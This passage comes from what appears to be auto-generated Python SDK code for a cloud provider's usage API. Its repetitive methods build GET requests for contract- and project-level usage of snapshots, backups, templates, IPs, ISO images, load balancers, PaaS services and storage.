query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/servers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ServersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_snapshot_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_snapshot_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_snapshot_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_snapshot_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_snapshot_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_snapshot_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/snapshots', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_storage_backup_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level storage backup usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_storage_backup_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: StorageBackupUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_storage_backup_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_storage_backup_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_storage_backup_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level storage backup usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_storage_backup_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: StorageBackupUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_storage_backup_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_storage_backup_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/storage_backups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StorageBackupUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_template_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level templates usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_template_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: TemplatesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_template_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_template_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_template_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level templates usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_template_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: TemplatesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_template_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_template_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/templates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplatesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: UsageGetResponseOverview
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: UsageGetResponseOverview
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UsageGetResponseOverview', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_distributed_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_distributed_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_distributed_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_distributed_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_distributed_storage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_distributed_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/distributed_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DistributedStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_ip_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_ip_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_ip_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_ip_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_ip_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_ip_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/ip_addresses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IpsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_isoimage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_isoimage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_isoimage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_isoimage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_isoimage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_isoimage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/iso_images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IsoimagesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_loadbalancer_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_loadbalancer_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_loadbalancer_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_loadbalancer_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_loadbalancer_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_loadbalancer_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/load_balancers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoadbalancersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_paas_service_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_paas_service_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_paas_service_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_paas_service_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_paas_service_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_paas_service_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/paas_services', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaasServicesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_rocket_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_rocket_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_rocket_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_rocket_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_rocket_storage_usage_get" % key
)
params[key] = val
